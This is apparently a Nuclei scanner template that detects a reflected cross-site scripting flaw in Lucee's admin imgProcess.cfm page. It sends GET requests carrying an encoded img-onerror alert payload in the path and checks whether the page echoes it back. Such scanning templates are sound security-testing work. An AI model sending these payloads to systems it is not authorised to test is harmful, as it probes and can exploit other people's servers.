id: lucee-xss

info:
  name: Lucee - Cross-Site Scripting
  author: incogbyte
  severity: high
  description: Lucee contains a cross-site scripting vulnerability. It allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/lucee-server-arbitrary-file-creation/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 2
  tags: lucee,xss,unauth,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"
      - "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=a onerror=alert('{{randstr}}')>"
          - "MissingIncludeException"
          - "lucee-err"
        part: body
        condition: and

# digest: 4b0a00483046022100b61d3d8dbc17d5c94b6aa5d4f6c97b41e2bcf91761559ea5a9cda9723a09d206022100fad2c8e6ff1902308676f0af0752ed0800ea90ac694efdfdcb76c2d131715317:922c64590222798bb761d5b6d8e72950
